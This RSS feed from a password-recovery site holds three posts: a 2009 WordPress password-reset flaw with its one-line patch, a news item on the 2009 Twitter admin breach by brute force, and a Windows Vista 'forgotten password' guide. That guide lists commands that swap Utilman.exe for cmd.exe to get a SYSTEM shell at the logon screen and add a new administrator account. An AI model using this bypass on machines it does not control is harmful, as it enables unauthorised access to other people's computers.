<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>What&#039;s My Pass? &#187; Admin</title>
	<atom:link href="http://www.whatsmypass.com/tag/admin/feed" rel="self" type="application/rss+xml" />
	<link>http://www.whatsmypass.com</link>
	<description>Password Recovery for Windows, Mac, Linux, browsers, email, instant messengers, BIOS</description>
	<lastBuildDate>Tue, 24 Jan 2012 16:08:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>WordPress Remote Admin Password Reset Vulnerability</title>
		<link>http://www.whatsmypass.com/wordpress-remote-admin-password-reset-vulnerability</link>
		<comments>http://www.whatsmypass.com/wordpress-remote-admin-password-reset-vulnerability#comments</comments>
		<pubDate>Tue, 11 Aug 2009 21:45:37 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Admin]]></category>
		<category><![CDATA[email account owner]]></category>
		<category><![CDATA[password reset]]></category>
		<category><![CDATA[php;]]></category>
		<category><![CDATA[Web browser]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Wordpress installation]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/wordpress-remote-admin-password-reset-vulnerability</guid>
		<description><![CDATA[A new post appeared on the WordPress discussion list today revealing more details about the process. Everyone is apparently able to reset a WordPress password if the email address of the WordPress user is known. All that needs to be done is to point the web browser at http://www.domain.com/wp-login.php?action=lostpassword to reset the password. The email [...]]]></description>
			<content:encoded><![CDATA[<p>A new post appeared on the <a href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html">WordPress</a> discussion list today revealing more details about the process. Everyone is apparently able to reset a WordPress password if the email address of the WordPress user is known. All that needs to be done is to point the web browser at http://www.domain.com/wp-login.php?action=lostpassword to reset the password. The email address of the account holder has to be supplied in the form. WordPress usually will send a confirmation email first asking the email account owner if the password should be reset. The vulnerability manipulates the query to skip this step.</p>
<p>It is not possible to exploit this vulnerability further which means attackers cannot get access to the user account. It can however be theoretically be used to reset the password regularly to lock the user or admin out of the WordPress blog.</p>
<p>A temporary fix for the remote admin password reset vulnerability was posted. WordPress administrators need to change one line of code in the wp-login.php file of the WordPress installation to protect their blog from the attack. There is no official release fixing this problem, apply <a href="http://core.trac.wordpress.org/changeset/11798">this changeset</a> to your <code>wp-login.php</code>.</p>
<p>change <strong>line 190</strong> in <strong>wp-login.php</strong> to</p>
<p>if ( empty( $key ) )</p>
<p>With</p>
<div>
<div>
<pre style="font-family: monospace;">    <span style="color: #b1b100;">if</span> <span style="color: #009900;">(</span> <span style="color: #990000;">empty</span><span style="color: #009900;">(</span> <span style="color: #000088;">$key</span> <span style="color: #009900;">)</span> <span style="color: #339933;">||</span> <span style="color: #990000;">is_array</span><span style="color: #009900;">(</span> <span style="color: #000088;">$key</span> <span style="color: #009900;">)</span> <span style="color: #009900;">)</span></pre>
</div>
</div>
<p>It is advised to apply the temporary fix as soon as possible to WordPress installations.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/wordpress-remote-admin-password-reset-vulnerability/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Twitter Hacked</title>
		<link>http://www.whatsmypass.com/twitter-hacked</link>
		<comments>http://www.whatsmypass.com/twitter-hacked#comments</comments>
		<pubDate>Wed, 07 Jan 2009 01:01:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Admin]]></category>
		<category><![CDATA[admin tools]]></category>
		<category><![CDATA[Barack Obama;]]></category>
		<category><![CDATA[Britney Spears;]]></category>
		<category><![CDATA[Elect Barack Obama;]]></category>
		<category><![CDATA[internal admin tools;]]></category>
		<category><![CDATA[President]]></category>
		<category><![CDATA[Rick Sanchez;]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=436</guid>
		<description><![CDATA[Someone hacked into Twitter’s internal admin tools and compromising 33 high profile accounts, including President Elect Barack Obama,Fox News,and Britney Spears. Here is Twitter’s official explanation. The password was obtained by a bruteforce method using a wordlist only because Twitter didnt have lockout mechanism for their admin login, and the cracker was able to keep [...]]]></description>
			<content:encoded><![CDATA[<p>Someone hacked into Twitter’s internal admin tools and compromising 33 high profile accounts, including President Elect Barack Obama,Fox News,and Britney Spears.<br />
<a href="http://farm2.static.flickr.com/1011/3171325464_5e565afbdc.jpg"><img alt="" src="http://farm2.static.flickr.com/1011/3171325464_5e565afbdc.jpg" width="490" height="249" /></a></p>
<p>Here is Twitter’s official <a href="http://blog.twitter.com/2009/01/monday-morning-madness.html">explanation</a>.</p>
<p>The password was obtained by a bruteforce method using a wordlist only because Twitter didnt have lockout mechanism for their admin login, and the cracker was able to keep trying new passwords until he got into an admin account of Crystal,who&#8217;d chosen the weak password &#8220;happiness.&#8221; </p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/twitter-hacked/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How To Gain access to Windows Vista</title>
		<link>http://www.whatsmypass.com/how-to-gain-access-to-windows-vista</link>
		<comments>http://www.whatsmypass.com/how-to-gain-access-to-windows-vista#comments</comments>
		<pubDate>Tue, 17 Jun 2008 00:31:55 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Admin]]></category>
		<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[Utility Manager]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=25</guid>
		<description><![CDATA[Using BackTrack Live CD which can be found ::here:: For those of you who forgot your spiffy new Vista Logon password. Here&#8217;s a quick and dirty way to make a new user account. BTW, this has been around since XP but still useful. Boot into Backtrack and open a shell prompt: cd /mnt (change directory [...]]]></description>
			<content:encoded><![CDATA[<p>Using BackTrack Live CD which can be found <a href="http://www.offensive-security.com">::here::</a></p>
<p>For those of you who forgot your spiffy new Vista Logon password. Here&#8217;s a quick and dirty way to make a new user account. BTW, this has been around since XP but still useful.</p>
<p><span id="more-21"></span></p>
<p>Boot into Backtrack and open a shell prompt:</p>
<p>cd /mnt                     (change directory to mounted drives)<br />
ls                          (get the list of mounted drives)<br />
cd sda1                     (sda1 is the main hard drive)<br />
cd Windows/                 (change to the windows directory)<br />
cd System32/                (change to the system directory)<br />
mv Utilman.exe Utilman.old  (backup original file)<br />
cp cmd.exe Utilman.exe      (copy cmd.exe as utilman.exe)<br />
reboot<br />
<a href="http://whatsmypass.com/images/bt-vista.PNG"><img src="http://whatsmypass.com/images/bt-vista.PNG" width="510" height="230"/></a></p>
<p>once rebooted, at vista logon screen, Press Windows key + U<br />
To invoke Utility Manager ( A.K.A. CMD.exe)<br />
Cmd.exe will spawn with &#8216;System&#8217; privileges.<br />
c:\&gt;net user S00perAdmin mypassword /add<br />
c:\&gt;net localgroup administrators S00perAdmin /add<br />
Reboot and log in with your newly added Admin account</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-gain-access-to-windows-vista/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

